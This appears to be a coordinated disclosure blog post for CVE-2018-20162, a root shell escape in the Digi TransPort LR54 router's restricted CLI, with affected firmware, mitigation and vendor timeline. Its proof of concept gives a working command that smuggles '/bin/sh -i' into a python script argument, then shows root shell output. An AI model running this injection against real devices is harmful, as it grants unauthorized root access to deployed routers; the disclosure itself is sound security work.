---
layout: post
title: "CVE-2018-20162: Digi TransPort LR54 Restricted Shell Escape"
author: sgo
category: security
---

The Digi TransPort LR54 is a high speed LTE router commonly used by industry,
infrastructure, retail and public transportation. 

It supports running python scripts in a restricted sandbox, and has a custom
shell accessible over SSH which is subjected to the same restrictions. The
underlying OS is therefore inaccessible to the administrator.

I've found a way to break out of the sandbox and obtaining a root shell by
exploiting the way the cli handles command line arguments when executing python
scripts:

When an interactive python process receives a SIGINT (trough CTRL-C), arguments
to the script are not properly escaped when passed to the interactive CLI's
error logging handler. This allows an attacker to execute arbitrary commands
as root.

To exploit this vulnerability, an attacker needs to have interactive CLI access
with 'super' privileges. A user with this access level is enabled by default on
the device.

# Vulnerable

Digi Transport LR54 (and maybe related products like WR64 and WR54)

Firmware Version  : 4.4.0.26 10/29/2018 21:14:06
Firmware Version  : 4.3.2.24 09/06/2018 00:58:34

And maybe earlier versions

# Migitation

Users should upgrade to firmware version 4.5.1.4 or newer. Secrets stored on the
device, like private keys and passphrases, should be changed as a precaution.

# Proof of Concept

1. Upload `sleep.py` to the LR54 using scp or sftp, containing: 

```
import time;time.sleep(10)
```

2. Execute the following command in the LR54 cli: 

```
python sleep.py --XXX $(/bin/sh -i >&2)
```

3. Immediately press `CTRL-C` after the program starts

4. You are then dropped to an interactive root shell 

```
/home/digi/user # uname -a
Linux (none) 3.10.14 #1 SMP Mon Oct 29 16:18:10 CDT 2018 mips GNU/Linux
/home/digi/user # id
uid=0(root) gid=2000(users_rw) groups=2000(users_rw),2002(users_super)
```

# Timeline

- 2018-12-13: Vulnerability discovered
- 2018-12-14: PoC created, Vendor notified
- 2018-12-14: Vendor confirmed, 60 day embargo. Applied for CVE.
- 2018-12-15: CVE-2018-20162 assigned
- 2018-12-31: Received pre-release firmware. Confirmed not vulnerable.
- 2019-01-02: Vendor releases fixed firmware 4.5.1.4
- 2019-01-25: Vendor updated release notes to reference CVE-2018-20162
- 2019-02-13: Vendor ok'ed disclosure, Embargo lifted

# References

- https://www.digi.com/products/networking/cellular-routers/digi-transport-lr54
- http://ftp1.digi.com/support/firmware/transport/LR54/v4.5.1.4/93001306_L.pdf
- https://www.digi.com/resources/security
- https://blog.hackeriet.no/cve-2018-20162-digi-lr54-restricted-shell-escape
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-20162

# Credits

Vulnerability discovered by Stig Palmquist.

Thanks to @duniel_pls and @alexanderkjall for reviewing this report.
